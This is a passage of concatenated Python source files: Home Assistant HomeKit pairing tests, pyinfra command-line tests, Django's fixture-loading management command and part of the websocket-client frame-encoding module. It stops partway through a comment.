"""Test user initiated pairing where no unpaired devices discovered."""
flow = _setup_flow_handler(hass)
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"md": "TestDevice",
"id": "00:00:00:00:00:00",
"c#": 1,
"sf": 0,
}
flow.controller.discover.return_value = [discovery_info]
result = await flow.async_step_user()
assert result["type"] == "abort"
assert result["reason"] == "no_devices"
async def test_parse_new_homekit_json(hass):
"""Test migrating recent .homekit/pairings.json files."""
service = FakeService("public.hap.service.lightbulb")
on_char = service.add_characteristic("on")
on_char.value = 1
accessory = Accessory("TestDevice", "example.com", "Test", "0001", "0.1")
accessory.services.append(service)
fake_controller = await setup_platform(hass)
pairing = fake_controller.add([accessory])
pairing.pairing_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_path = mock.Mock()
mock_path.exists.side_effect = [True, False]
read_data = {"00:00:00:00:00:00": pairing.pairing_data}
mock_open = mock.mock_open(read_data=json.dumps(read_data))
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
with mock.patch("builtins.open", mock_open):
with mock.patch("os.path", mock_path):
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "create_entry"
assert result["title"] == "TestDevice"
assert result["data"]["AccessoryPairingID"] == "00:00:00:00:00:00"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_parse_old_homekit_json(hass):
"""Test migrating original .homekit/hk-00:00:00:00:00:00 files."""
service = FakeService("public.hap.service.lightbulb")
on_char = service.add_characteristic("on")
on_char.value = 1
accessory = Accessory("TestDevice", "example.com", "Test", "0001", "0.1")
accessory.services.append(service)
fake_controller = await setup_platform(hass)
pairing = fake_controller.add([accessory])
pairing.pairing_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_path = mock.Mock()
mock_path.exists.side_effect = [False, True]
mock_listdir = mock.Mock()
mock_listdir.return_value = ["hk-00:00:00:00:00:00", "pairings.json"]
read_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_open = mock.mock_open(read_data=json.dumps(read_data))
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
with mock.patch("builtins.open", mock_open):
with mock.patch("os.path", mock_path):
with mock.patch("os.listdir", mock_listdir):
result = await flow.async_step_zeroconf(discovery_info)
assert result["type"] == "create_entry"
assert result["title"] == "TestDevice"
assert result["data"]["AccessoryPairingID"] == "00:00:00:00:00:00"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
async def test_parse_overlapping_homekit_json(hass):
"""Test migrating .homekit/pairings.json files when hk- exists too."""
service = FakeService("public.hap.service.lightbulb")
on_char = service.add_characteristic("on")
on_char.value = 1
accessory = Accessory("TestDevice", "example.com", "Test", "0001", "0.1")
accessory.services.append(service)
fake_controller = await setup_platform(hass)
pairing = fake_controller.add([accessory])
pairing.pairing_data = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_listdir = mock.Mock()
mock_listdir.return_value = ["hk-00:00:00:00:00:00", "pairings.json"]
mock_path = mock.Mock()
mock_path.exists.side_effect = [True, True]
# First file to get loaded is .homekit/pairings.json
read_data_1 = {"00:00:00:00:00:00": {"AccessoryPairingID": "00:00:00:00:00:00"}}
mock_open_1 = mock.mock_open(read_data=json.dumps(read_data_1))
# Second file to get loaded is .homekit/hk-00:00:00:00:00:00
read_data_2 = {"AccessoryPairingID": "00:00:00:00:00:00"}
mock_open_2 = mock.mock_open(read_data=json.dumps(read_data_2))
side_effects = [mock_open_1.return_value, mock_open_2.return_value]
discovery_info = {
"name": "TestDevice",
"host": "127.0.0.1",
"port": 8080,
"properties": {"md": "TestDevice", "id": "00:00:00:00:00:00", "c#": 1, "sf": 0},
}
flow = _setup_flow_handler(hass)
pairing_cls_imp = (
"homeassistant.components.homekit_controller.config_flow.IpPairing"
)
with mock.patch(pairing_cls_imp) as pairing_cls:
pairing_cls.return_value = pairing
with mock.patch("builtins.open", side_effect=side_effects):
with mock.patch("os.path", mock_path):
with mock.patch("os.listdir", mock_listdir):
result = await flow.async_step_zeroconf(discovery_info)
await hass.async_block_till_done()
assert result["type"] == "create_entry"
assert result["title"] == "TestDevice"
assert result["data"]["AccessoryPairingID"] == "00:00:00:00:00:00"
assert flow.context == {
"hkid": "00:00:00:00:00:00",
"title_placeholders": {"name": "TestDevice"},
"unique_id": "00:00:00:00:00:00",
}
|
|
from os import path
from random import shuffle
from unittest import TestCase
from click.testing import CliRunner
import pyinfra
from pyinfra import pseudo_state
from pyinfra_cli.main import _main, cli
from ..paramiko_util import PatchSSHTestCase
def run_cli(*arguments):
pyinfra.is_cli = True
runner = CliRunner(mix_stderr=False)
result = runner.invoke(cli, arguments)
pyinfra.is_cli = False
return result
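# Example (illustrative): run_cli('@local', 'deploy.py') invokes the click
# CLI in-process and returns a click.testing.Result whose exit_code, stdout
# and stderr the tests below assert on; pyinfra.is_cli is toggled so the
# code under test behaves as if launched from the command line.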
class TestCliEagerFlags(TestCase):
def test_print_help(self):
result = run_cli('--version')
assert result.exit_code == 0, result.stderr
result = run_cli('--help')
assert result.exit_code == 0, result.stderr
def test_print_facts_list(self):
result = run_cli('--facts')
assert result.exit_code == 0, result.stderr
def test_print_operations_list(self):
result = run_cli('--operations')
assert result.exit_code == 0, result.stderr
class TestDeployCli(PatchSSHTestCase):
def setUp(self):
pseudo_state.reset()
def test_invalid_deploy(self):
result = run_cli(
'@local',
'not-a-file.py',
)
assert result.exit_code == 1, result.stderr
assert 'No deploy file: not-a-file.py' in result.stderr
class TestOperationCli(PatchSSHTestCase):
def test_invalid_operation_module(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'not_a_module.shell',
)
assert result.exit_code == 1, result.stderr
assert 'No such module: not_a_module' in result.stderr
def test_invalid_operation_function(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'server.not_an_operation',
)
assert result.exit_code == 1, result.stderr
assert 'No such operation: server.not_an_operation' in result.stderr
def test_deploy_inventory(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'server.shell',
'--debug-data',
)
assert result.exit_code == 0, result.stderr
def test_deploy_operation(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'server.shell',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_deploy_operation_with_all(self):
result = run_cli(
path.join('tests', 'deploy', 'inventory_all.py'),
'server.shell',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_deploy_operation_json_args(self):
result = run_cli(
path.join('tests', 'deploy', 'inventory_all.py'),
'server.shell',
'[["echo hi"], {}]',
)
assert result.exit_code == 0, result.stderr
class TestFactCli(PatchSSHTestCase):
def test_get_fact(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'server.Os',
)
assert result.exit_code == 0, result.stderr
assert '"somehost": null' in result.stderr
def test_get_fact_with_kwargs(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'files.File',
'path=.',
)
assert result.exit_code == 0, result.stderr
assert '"somehost": null' in result.stderr
def test_invalid_fact_module(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'not_a_module.NotAFact',
)
assert result.exit_code == 1, result.stderr
assert 'No such module: not_a_module' in result.stderr
def test_invalid_fact_class(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'server.NotAFact',
)
assert result.exit_code == 1, result.stderr
assert 'No such fact: server.NotAFact' in result.stderr
def test_get_facts_legacy(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'fact',
'os',
)
assert result.exit_code == 0, result.stderr
assert '"somehost": null' in result.stderr
class TestExecCli(PatchSSHTestCase):
def test_exec_command(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_options(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--sudo',
'--sudo-user', 'pyinfra',
'--su-user', 'pyinfrawhat',
'--port', '1022',
'--user', 'ubuntu',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_serial(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--serial',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_no_wait(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--no-wait',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_debug_operations(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--debug-operations',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_debug_facts(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--debug-facts',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
def test_exec_command_with_debug_data_limit(self):
result = run_cli(
path.join('tests', 'deploy', 'inventories', 'inventory.py'),
'exec',
'--debug-data',
'--limit', 'somehost',
'--',
'echo hi',
)
assert result.exit_code == 0, result.stderr
class TestCliDeployState(PatchSSHTestCase):
def _assert_op_data(self, correct_op_name_and_host_names):
state = pseudo_state
op_order = state.get_op_order()
assert (
len(correct_op_name_and_host_names) == len(op_order)
), 'Incorrect number of operations detected'
for i, (correct_op_name, correct_host_names) in enumerate(
correct_op_name_and_host_names,
):
op_hash = op_order[i]
op_meta = state.op_meta[op_hash]
assert list(op_meta['names'])[0] == correct_op_name
for host in state.inventory:
op_hashes = state.meta[host]['op_hashes']
if correct_host_names is True or host.name in correct_host_names:
self.assertIn(op_hash, op_hashes)
else:
self.assertNotIn(op_hash, op_hashes)
def test_deploy(self):
task_file_path = path.join('tests', 'deploy', 'tasks', 'a_task.py')
nested_task_path = path.join('tests', 'deploy', 'tasks', 'another_task.py')
correct_op_name_and_host_names = [
('First main operation', True), # true for all hosts
('Second main operation', ('somehost',)),
('{0} | First task operation'.format(task_file_path), ('anotherhost',)),
('{0} | Task order loop 1'.format(task_file_path), ('anotherhost',)),
('{0} | 2nd Task order loop 1'.format(task_file_path), ('anotherhost',)),
('{0} | Task order loop 2'.format(task_file_path), ('anotherhost',)),
('{0} | 2nd Task order loop 2'.format(task_file_path), ('anotherhost',)),
(
'{0} | {1} | Second task operation'.format(task_file_path, nested_task_path),
('anotherhost',),
),
('{0} | First task operation'.format(task_file_path), True),
('{0} | Task order loop 1'.format(task_file_path), True),
('{0} | 2nd Task order loop 1'.format(task_file_path), True),
('{0} | Task order loop 2'.format(task_file_path), True),
('{0} | 2nd Task order loop 2'.format(task_file_path), True),
('{0} | {1} | Second task operation'.format(task_file_path, nested_task_path), True),
('My deploy | First deploy operation', True),
('My deploy | My nested deploy | First nested deploy operation', True),
('My deploy | Second deploy operation', True),
('Loop-0 main operation', True),
('Loop-1 main operation', True),
('Third main operation', True),
('Order loop 1', True),
('2nd Order loop 1', True),
('Order loop 2', True),
('2nd Order loop 2', True),
('Final limited operation', ('somehost',)),
]
# Run 3 iterations of the test - each time shuffling the order of the
# hosts - ensuring that the ordering has no effect on the operation order.
for _ in range(3):
pseudo_state.reset()
hosts = ['somehost', 'anotherhost', 'someotherhost']
shuffle(hosts)
result = run_cli(
','.join(hosts),
path.join('tests', 'deploy', 'deploy.py'),
)
assert result.exit_code == 0, result.stderr
self._assert_op_data(correct_op_name_and_host_names)
def test_legacy_deploy(self):
pseudo_state.reset()
result = run_cli(
'somehost',
path.join('tests', 'deploy', 'deploy_legacy.py'),
)
assert result.exit_code == 0, result.stderr
correct_op_name_and_host_names = [
('First main operation', True),
('My deploy | My nested deploy | First nested deploy operation', True),
('My deploy | Second deploy operation', True),
]
self._assert_op_data(correct_op_name_and_host_names)
def test_interdependent_deploy(self):
pseudo_state.reset()
result = run_cli(
'somehost',
path.join('tests', 'deploy', 'deploy_interdependent.py'),
)
assert result.exit_code == 0, result.stderr
# Check every operation had commands/changes - this ensures that each
# combo (add/remove/add) always had changes.
for host, ops in pseudo_state.ops.items():
for _, op in ops.items():
assert len(op['commands']) > 0
class TestDirectMainExecution(PatchSSHTestCase):
'''
These tests are very similar to those above, but without the click wrappers - they
exist mainly because coverage.py fails to properly detect code executed under the wrapper.
'''
def test_deploy_operation_direct(self):
with self.assertRaises(SystemExit) as e:
_main(
inventory=path.join('tests', 'test_deploy', 'inventories', 'inventory.py'),
operations=['server.shell', 'echo hi'],
verbosity=0, ssh_user=None, ssh_port=None, ssh_key=None, ssh_key_password=None,
ssh_password=None,
sudo=False, sudo_user=None, use_sudo_password=False, su_user=None,
parallel=None, fail_percent=0, dry=False, limit=None, no_wait=False, serial=False,
winrm_username=None, winrm_password=None, winrm_port=None, winrm_transport=None,
shell_executable=None, quiet=False, data=tuple(),
debug=False, debug_data=False, debug_facts=False, debug_operations=False,
config_filename='config.py',
)
assert e.args == (0,)
|
|
from __future__ import unicode_literals
import glob
import gzip
import os
import warnings
import zipfile
from django.apps import apps
from django.conf import settings
from django.core import serializers
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand, CommandError
from django.core.management.color import no_style
from django.db import (connections, router, transaction, DEFAULT_DB_ALIAS,
IntegrityError, DatabaseError)
from django.utils import lru_cache
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango19Warning
from itertools import product
try:
import bz2
has_bz2 = True
except ImportError:
has_bz2 = False
class Command(BaseCommand):
help = 'Installs the named fixture(s) in the database.'
missing_args_message = ("No database fixture specified. Please provide the "
"path of at least one fixture in the command line.")
def add_arguments(self, parser):
parser.add_argument('args', metavar='fixture', nargs='+',
help='Fixture labels.')
parser.add_argument('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a specific database to load '
'fixtures into. Defaults to the "default" database.')
parser.add_argument('--app', action='store', dest='app_label',
default=None, help='Only look for fixtures in the specified app.')
parser.add_argument('--ignorenonexistent', '-i', action='store_true',
dest='ignore', default=False,
help='Ignores entries in the serialized data for fields that do not '
'currently exist on the model.')
def handle(self, *fixture_labels, **options):
self.ignore = options.get('ignore')
self.using = options.get('database')
self.app_label = options.get('app_label')
self.hide_empty = options.get('hide_empty', False)
self.verbosity = options.get('verbosity')
with transaction.atomic(using=self.using):
self.loaddata(fixture_labels)
# Close the DB connection -- unless we're still in a transaction. This
# is required as a workaround for an edge case in MySQL: if the same
# connection is used to create tables, load data, and query, the query
# can return incorrect results. See Django #7572, MySQL #37735.
if transaction.get_autocommit(self.using):
connections[self.using].close()
def loaddata(self, fixture_labels):
connection = connections[self.using]
# Keep a count of the installed objects and fixtures
self.fixture_count = 0
self.loaded_object_count = 0
self.fixture_object_count = 0
self.models = set()
self.serialization_formats = serializers.get_public_serializer_formats()
# Forcing binary mode may be revisited after dropping Python 2 support (see #22399)
self.compression_formats = {
None: (open, 'rb'),
'gz': (gzip.GzipFile, 'rb'),
'zip': (SingleZipReader, 'r'),
}
if has_bz2:
self.compression_formats['bz2'] = (bz2.BZ2File, 'r')
with connection.constraint_checks_disabled():
for fixture_label in fixture_labels:
self.load_label(fixture_label)
# Since we disabled constraint checks, we must manually check for
# any invalid keys that might have been added
table_names = [model._meta.db_table for model in self.models]
try:
connection.check_constraints(table_names=table_names)
except Exception as e:
e.args = ("Problem installing fixtures: %s" % e,)
raise
# If we found even one object in a fixture, we need to reset the
# database sequences.
if self.loaded_object_count > 0:
sequence_sql = connection.ops.sequence_reset_sql(no_style(), self.models)
if sequence_sql:
if self.verbosity >= 2:
self.stdout.write("Resetting sequences\n")
with connection.cursor() as cursor:
for line in sequence_sql:
cursor.execute(line)
if self.verbosity >= 1:
if self.fixture_count == 0 and self.hide_empty:
pass
elif self.fixture_object_count == self.loaded_object_count:
self.stdout.write("Installed %d object(s) from %d fixture(s)" %
(self.loaded_object_count, self.fixture_count))
else:
self.stdout.write("Installed %d object(s) (of %d) from %d fixture(s)" %
(self.loaded_object_count, self.fixture_object_count, self.fixture_count))
def load_label(self, fixture_label):
"""
Loads fixture files for a given label.
"""
for fixture_file, fixture_dir, fixture_name in self.find_fixtures(fixture_label):
_, ser_fmt, cmp_fmt = self.parse_name(os.path.basename(fixture_file))
open_method, mode = self.compression_formats[cmp_fmt]
fixture = open_method(fixture_file, mode)
try:
self.fixture_count += 1
objects_in_fixture = 0
loaded_objects_in_fixture = 0
if self.verbosity >= 2:
self.stdout.write("Installing %s fixture '%s' from %s." %
(ser_fmt, fixture_name, humanize(fixture_dir)))
objects = serializers.deserialize(ser_fmt, fixture,
using=self.using, ignorenonexistent=self.ignore)
for obj in objects:
objects_in_fixture += 1
if router.allow_migrate(self.using, obj.object.__class__):
loaded_objects_in_fixture += 1
self.models.add(obj.object.__class__)
try:
obj.save(using=self.using)
except (DatabaseError, IntegrityError) as e:
e.args = ("Could not load %(app_label)s.%(object_name)s(pk=%(pk)s): %(error_msg)s" % {
'app_label': obj.object._meta.app_label,
'object_name': obj.object._meta.object_name,
'pk': obj.object.pk,
'error_msg': force_text(e)
},)
raise
self.loaded_object_count += loaded_objects_in_fixture
self.fixture_object_count += objects_in_fixture
except Exception as e:
if not isinstance(e, CommandError):
e.args = ("Problem installing fixture '%s': %s" % (fixture_file, e),)
raise
finally:
fixture.close()
# Warn if the fixture we loaded contains 0 objects.
if objects_in_fixture == 0:
warnings.warn(
"No fixture data found for '%s'. (File format may be "
"invalid.)" % fixture_name,
RuntimeWarning
)
@lru_cache.lru_cache(maxsize=None)
def find_fixtures(self, fixture_label):
"""
Finds fixture files for a given label.
"""
fixture_name, ser_fmt, cmp_fmt = self.parse_name(fixture_label)
databases = [self.using, None]
cmp_fmts = list(self.compression_formats.keys()) if cmp_fmt is None else [cmp_fmt]
ser_fmts = serializers.get_public_serializer_formats() if ser_fmt is None else [ser_fmt]
if self.verbosity >= 2:
self.stdout.write("Loading '%s' fixtures..." % fixture_name)
if os.path.isabs(fixture_name):
fixture_dirs = [os.path.dirname(fixture_name)]
fixture_name = os.path.basename(fixture_name)
else:
fixture_dirs = self.fixture_dirs
if os.path.sep in os.path.normpath(fixture_name):
fixture_dirs = [os.path.join(dir_, os.path.dirname(fixture_name))
for dir_ in fixture_dirs]
fixture_name = os.path.basename(fixture_name)
suffixes = ('.'.join(ext for ext in combo if ext)
for combo in product(databases, ser_fmts, cmp_fmts))
targets = set('.'.join((fixture_name, suffix)) for suffix in suffixes)
fixture_files = []
for fixture_dir in fixture_dirs:
if self.verbosity >= 2:
self.stdout.write("Checking %s for fixtures..." % humanize(fixture_dir))
fixture_files_in_dir = []
for candidate in glob.iglob(os.path.join(fixture_dir, fixture_name + '*')):
if os.path.basename(candidate) in targets:
# Save the fixture_dir and fixture_name for future error messages.
fixture_files_in_dir.append((candidate, fixture_dir, fixture_name))
if self.verbosity >= 2 and not fixture_files_in_dir:
self.stdout.write("No fixture '%s' in %s." %
(fixture_name, humanize(fixture_dir)))
# Check kept for backwards-compatibility; it isn't clear why
# duplicates are only allowed in different directories.
if len(fixture_files_in_dir) > 1:
raise CommandError(
"Multiple fixtures named '%s' in %s. Aborting." %
(fixture_name, humanize(fixture_dir)))
fixture_files.extend(fixture_files_in_dir)
if fixture_name != 'initial_data' and not fixture_files:
# Warning kept for backwards-compatibility; why not an exception?
warnings.warn("No fixture named '%s' found." % fixture_name)
elif fixture_name == 'initial_data' and fixture_files:
warnings.warn(
'initial_data fixtures are deprecated. Use data migrations instead.',
RemovedInDjango19Warning
)
return fixture_files
@cached_property
def fixture_dirs(self):
"""
Return a list of fixture directories.
The list contains the 'fixtures' subdirectory of each installed
application, if it exists, the directories in FIXTURE_DIRS, and the
current directory.
"""
dirs = []
fixture_dirs = settings.FIXTURE_DIRS
if len(fixture_dirs) != len(set(fixture_dirs)):
raise ImproperlyConfigured("settings.FIXTURE_DIRS contains duplicates.")
for app_config in apps.get_app_configs():
app_label = app_config.label
app_dir = os.path.join(app_config.path, 'fixtures')
if app_dir in fixture_dirs:
raise ImproperlyConfigured(
"'%s' is a default fixture directory for the '%s' app "
"and cannot be listed in settings.FIXTURE_DIRS." % (app_dir, app_label)
)
if self.app_label and app_label != self.app_label:
continue
if os.path.isdir(app_dir):
dirs.append(app_dir)
dirs.extend(list(fixture_dirs))
dirs.append('')
dirs = [upath(os.path.abspath(os.path.realpath(d))) for d in dirs]
return dirs
def parse_name(self, fixture_name):
"""
        Splits the fixture name into name, serialization format, and compression format.
"""
parts = fixture_name.rsplit('.', 2)
if len(parts) > 1 and parts[-1] in self.compression_formats:
cmp_fmt = parts[-1]
parts = parts[:-1]
else:
cmp_fmt = None
if len(parts) > 1:
if parts[-1] in self.serialization_formats:
ser_fmt = parts[-1]
parts = parts[:-1]
else:
raise CommandError(
"Problem installing fixture '%s': %s is not a known "
"serialization format." % (''.join(parts[:-1]), parts[-1]))
else:
ser_fmt = None
name = '.'.join(parts)
return name, ser_fmt, cmp_fmt
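# Illustrative sketch (not part of Django): parse_name() peels at most two
# suffixes off the right of a fixture label -- first an optional compression
# format, then an optional serialization format -- so 'mydata.json.zip' maps
# to ('mydata', 'json', 'zip') and a bare 'mydata' maps to
# ('mydata', None, None). The standalone helper below mirrors that logic with
# hypothetical format sets; unlike the real method it silently keeps an
# unknown middle suffix as part of the name instead of raising CommandError.
def _example_split_fixture_name(name, cmp_fmts=('bz2', 'gz', 'zip'),
                                ser_fmts=('json', 'xml', 'yaml')):
    parts = name.rsplit('.', 2)
    cmp_fmt = None
    if len(parts) > 1 and parts[-1] in cmp_fmts:
        cmp_fmt = parts[-1]
        parts = parts[:-1]
    ser_fmt = None
    if len(parts) > 1 and parts[-1] in ser_fmts:
        ser_fmt = parts[-1]
        parts = parts[:-1]
    return '.'.join(parts), ser_fmt, cmp_fmt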
class SingleZipReader(zipfile.ZipFile):
def __init__(self, *args, **kwargs):
zipfile.ZipFile.__init__(self, *args, **kwargs)
if len(self.namelist()) != 1:
raise ValueError("Zip-compressed fixtures must contain one file.")
def read(self):
return zipfile.ZipFile.read(self, self.namelist()[0])
def humanize(dirname):
return "'%s'" % dirname if dirname else 'absolute path'
|
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import six
import array
import struct
import os
from ._exceptions import *
from ._utils import validate_utf8
try:
# If wsaccel is available we use compiled routines to mask data.
from wsaccel.xormask import XorMaskerSimple
def _mask(_m, _d):
return XorMaskerSimple(_m).process(_d)
except ImportError:
    # wsaccel is not available, so we fall back to a pure-Python implementation.
def _mask(_m, _d):
for i in range(len(_d)):
_d[i] ^= _m[i % 4]
if six.PY3:
return _d.tobytes()
else:
return _d.tostring()
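# Quick sanity sketch (illustrative only, not part of the library): XOR masking
# is its own inverse, so applying _mask twice with the same 4-byte key returns
# the original payload. The key and payload below are made-up assumptions; the
# array.array("B", ...) representation matches what ABNF.mask() builds.
def _example_mask_roundtrip():
    key = b"\x01\x02\x03\x04"
    payload = b"hello websocket"
    masked = _mask(array.array("B", key), array.array("B", payload))
    unmasked = _mask(array.array("B", key), array.array("B", masked))
    assert unmasked == payload
    return masked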
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
VALID_CLOSE_STATUS = (
STATUS_NORMAL,
STATUS_GOING_AWAY,
STATUS_PROTOCOL_ERROR,
STATUS_UNSUPPORTED_DATA_TYPE,
STATUS_INVALID_PAYLOAD,
STATUS_POLICY_VIOLATION,
STATUS_MESSAGE_TOO_BIG,
STATUS_INVALID_EXTENSION,
STATUS_UNEXPECTED_CONDITION,
)
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_CONT = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# available operation code value tuple
OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE,
OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_CONT: "cont",
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong"
}
# data length threshold.
LENGTH_7 = 0x7e
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(self, fin=0, rsv1=0, rsv2=0, rsv3=0,
opcode=OPCODE_TEXT, mask=1, data=""):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
if data == None:
data = ""
self.data = data
self.get_mask_key = os.urandom
def validate(self, skip_utf8_validation=False):
"""
validate the ABNF frame.
skip_utf8_validation: skip utf8 validation.
"""
if self.rsv1 or self.rsv2 or self.rsv3:
raise WebSocketProtocolException("rsv is not implemented, yet")
if self.opcode not in ABNF.OPCODES:
raise WebSocketProtocolException("Invalid opcode %r", self.opcode)
if self.opcode == ABNF.OPCODE_PING and not self.fin:
raise WebSocketProtocolException("Invalid ping frame.")
if self.opcode == ABNF.OPCODE_CLOSE:
l = len(self.data)
if not l:
return
if l == 1 or l >= 126:
raise WebSocketProtocolException("Invalid close frame.")
if l > 2 and not skip_utf8_validation and not validate_utf8(self.data[2:]):
raise WebSocketProtocolException("Invalid close frame.")
code = 256*six.byte2int(self.data[0:1]) + six.byte2int(self.data[1:2])
if not self._is_valid_close_status(code):
raise WebSocketProtocolException("Invalid close opcode.")
def _is_valid_close_status(self, code):
        return code in VALID_CLOSE_STATUS or (3000 <= code < 5000)
def __str__(self):
return "fin=" + str(self.fin) \
+ " opcode=" + str(self.opcode) \
+ " data=" + str(self.data)
@staticmethod
def create_frame(data, opcode, fin=1):
"""
create frame to send text, binary and other data.
        data: data to send. This is a string value (byte array).
              If opcode is OPCODE_TEXT and this value is a unicode string,
              it is encoded to a UTF-8 byte string automatically.
opcode: operation code. please see OPCODE_XXX.
fin: fin flag. if set to 0, create continue fragmentation.
"""
if opcode == ABNF.OPCODE_TEXT and isinstance(data, six.text_type):
data = data.encode("utf-8")
# mask must be set if send data from client
return ABNF(fin, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(self.fin << 7
| self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4
| self.opcode)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
frame_header = six.b(frame_header)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7e)
frame_header = six.b(frame_header)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7f)
frame_header = six.b(frame_header)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
if isinstance(mask_key, six.text_type):
mask_key = mask_key.encode('utf-8')
return mask_key + s
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
if data == None:
data = ""
if isinstance(mask_key, six.text_type):
mask_key = six.b(mask_key)
if isinstance(data, six.text_type):
data = six.b(data)
_m = array.array("B", mask_key)
_d = array.array("B", data)
return _mask(_m, _d)
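# Illustrative sketch (not part of the library): building a one-shot masked
# text frame and inspecting the wire bytes produced by format(). The fixed
# mask key is a demonstration-only assumption; real clients keep the default
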